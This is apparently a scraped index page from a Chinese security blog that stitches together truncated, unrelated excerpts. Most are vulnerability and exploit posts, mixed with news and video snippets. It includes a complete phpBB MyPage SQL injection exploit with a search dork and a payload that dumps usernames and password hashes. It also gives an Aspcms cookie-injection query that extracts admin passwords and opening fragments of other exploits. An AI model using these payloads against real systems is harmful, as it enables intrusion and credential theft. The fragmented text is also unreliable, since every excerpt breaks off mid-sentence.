由于marquee标签现在用得是越来越少了，所以滚动效果的做法大多也都改用javascript来实现了。 之所以抛弃marquee是因为mar

标签云功能过滤不严。导致会员可在任意商品详细页，输入跨站JS脚本引用。致后台管理员帐号泄漏。 外部test.js文件内容。实现后台修改管理员帐

作者：sfcuboy 创建圈子和编辑圈子时未对圈子的描述内容进行过滤。可以插入外部JS文件引用。管理员在查看后台圈子列表时中招。运行外部JS文

哈尔滨四岁女童照料瘫痪双亲 零下17度穿破裤拖鞋：https://lcx.cc/post/2016/ 原帖地址：http://tieba.bai

网友坚称：水星旁边惊现UFO！？ UFO造访水星视频遭网友曝光 美天文学家否认 日前，一段神秘的视频在著名视频分享网站Youtube上获得了极高的

小孙悦在给妈妈喂水 全家人在一起 室外是零下17度的气温，小孙悦穿着拖鞋铲煤 每天都要生火做饭 八家子屯，一个离哈尔滨100多公里远的偏僻小山村。近

视频：这才是猩球崛起，卧槽，真不怕死，猩猩拿AK47！

==================================================== MyPage plugin (phpBB) SQL Injection (All versions) ==================================================== ==================================================== Improve your hacking knowledges ! ==================================================== ==================================================== VISIT http://HackSociety.net ! ==================================================== # Exploit Title: SQL Injection on the plugin phpBB plugin MyPage # Google Dork: inurl:"mypage.php?id=" # Date: 06/12/2011 # Author: CrazyMouse (from HackSociety.net) # Version: 0.2.3 (this is the last avaliable version, older versions are also vulnerable) # Tested on: Windows 7 x64 (Firefox) ==================================================== VISIT http://HackSociety.net ! ==================================================== [~] Exploit:         http://localhost/forum/ [~]     http://localhost/forum/mypage.php?id= (SQL) [~] Example:     http://server/forum/mypage.php?id=1%27+and%28select+1+from%28select+count%28*%29%2Cconcat%28%28select+%28select+%28select+concat%280x7e%2C0x27%2Cphpbb_users.user_id%2C0x5e%2Cphpbb_users.user_type%2C0x5e%2Cphpbb_users.group_id%2C0x5e%2Cphpbb_users.username%2C0x5e%2Cphpbb_users.user_password%2C0x27%2C0x7e%29+from+%60forum_domperm%60.phpbb_users+limit+5%2C1%29+%29+from+%60information_schema%60.tables+limit+0%2C1%29%2Cfloor%28rand%280%29*2%29%29x+from+%60information_schema%60.tables+group+by+x%29a%29+and+%271%27%3D%271 ==================================================== # Thanks to Crassus ==================================================== ==================================================== VISIT http://HackSociety.net ! ==================================================== 留言评论（旧系统）： 【匿名者】 @ 2012-09-08 02:23:56 You put the lime in the coconut and drink the arctile up. 本站回复： [暂无回复

某天遇到Excms的系统，官网http://www.excms.cn/ 于GG搜索excms漏洞，发现 http://www.myhack58.com/Article/html/3/62/2011/28871.htm 分析中是作者明显藏有后门的漏洞。 下载源

XSS两三事(第一季) Author:ShadowHider Email:s@xeye.us 这几天发现论坛里讨论XSS的帖子多了起来，刚好我以前也折腾过一阵子XSS，就斗胆来和大家交流分享下。 下面分享几个不

t00ls最近要暴走大清理哇，不幸名单在列，发个文章保住ID先。 恩，xss老生常谈了xss的发现也是有一些技巧的，这里介绍一种。 很多人习惯是

标题：【CSRF】基于图片方式(<img)的 DDOS、CC、会话劫持以及刺探用户信息 关于：基于js的CC攻击实现与防御、以及图片方式的

很久以前写的了！ 首先说下为什么要渗透这个站，在浏览CNBeta的时候看到了一篇文章，附上文章地址！ http://www.cnbeta.com/articles/131702.htm 文章里所说，网站主要是百度造成的，而我并

- 从核心降荣誉  从荣誉贬会员   现在连ID也要被清了。。  鸭梨山大 一、前台注

黑名单警告了.....赶紧发个洞洞解危下.. 官网:http://www.wqeshop.com/ 也不晓得用的人多不多..上次搞站的时候..不

冒失没人转。。。 Aspcms 1.5 COOKIES注入0day，注册一个帐号。然后登陆后修改COOKIES的USERID值 在后面加上注入语句: UNION SELECT 1,2,3,4,5,6,username,adminpassword,9,10,11,12,13,14,15,16,17,18,19,20,21,22 from Aspcms_admins 然后

phpMyFAQ是一个支持多语言的FAQ系统。主要是洋人用的。。国内也有。。不多。。 思来想去还是改改标题把。。 好了 直接说如何拿shell把。

    360Safe 与 360Chrome 浏览器缓冲区溢出漏洞，360Safe & 360Chrome browsers buffer overflow exploit。     转自：http://forum.sysinternals.com/3

男人没钱是垃圾，结婚就是一场《巨额交配》 留言评论（旧系统）： 【匿名者】 @ 2011-12-08 21:53:35 充分的可以看出来！。男和男，女和女。在一起才算纯洁的爱情！ 本站回

Family connections CMS v2.5.0-v2.7.1 远程命令执行漏洞，Family Connections CMS v2.5.0-v2.7.1 (less.php) Remote Command Execution，Family connections CMS v2.5.0-v2.7.1 remote command execution exploit。 <?php /* Family connections CMS v2.5.0-v2.7.1 remote command execution exploit vendor_________: https://www.familycms.com/ software link__: https://www.familycms.com/download.php

图注：奢侈品电子商务呼哈网正遭遇全体员工讨薪(TechWeb配图) 12月5日消息，奢侈品电子商务呼哈网(wooha.com)正遭遇全体员工讨

这个是最近才弄的页面（2011-12-06 09:36），以前没有的，所以有相当多以前的好文章都有没整理出来…… 不过，从现在开始，有价值的文章

我操！太牛逼了！ 这个链接：https://lcx.cc/post/1890/ 有谁可以访问？？？？ 这个链接，居然被GFW屏蔽了！ 可能有极少数地

一条龙开服专用WEB系统。 就是那些给几千元就送个配置好的服务器给你立刻当GM的东西，骗了不少无知少年。 加密的，很难找到了解密文件。 看代码。 L

Windows 批处理中特殊符号的作用 @ 隐藏命令的回显。 ~ 在for中表示使用增强的变量扩展； 在set中表示使用扩展环境变量指定位置的字符串； 在set/a中

首先，今天找电影，发现白蛇传说这部电影，然后又跑去官网看了看，居然发现被挂了诈骗广告！ 白蛇传说官网地址：http://www.baishec

timthumb.php是一个非常流行的Wordpress的缩略图脚本。国外一些非常著名的主题都用到了这个插件，比如Woothemes等。 漏

I m better than TESO! CONFIDENTIAL SOURCE MATERIALS!   [*]----------------------------------------------------[*]   Serv-U FTP Server Jail Break 0day   Discovered By Kingcope   Year 2011 [*]----------------------------------------------------[*]   Affected: 220 Serv-U FTP Server v7.3 ready... 220 Serv-U FTP Server v7.1 ready... 220 Serv-U FTP Server v6.4 ready... 220 Serv-U FTP Server v8.2 ready... 220 Serv-U FTP Server v10.5 ready...   [*]----------------------------------------------------[*] C:\Users\kingcope\Desktop>ftp 192.168.133.134 Verbindung mit 192.168.133.134 wurde hergestellt. 220 Serv-U FTP Server

Author：西_决 小菜第一次发帖，大牛脚下留情啊！ 注册会员 ---》 发布文章 ---》 写日志的编辑器fck   浏览服务器&

用户后台发信箱标题直接插入JS脚本 收信者即会中招，偶对管理员进行了测试！ 不过2分钟就收到信了！ 科迅CMS会将用户、密码、认证码存入COOKI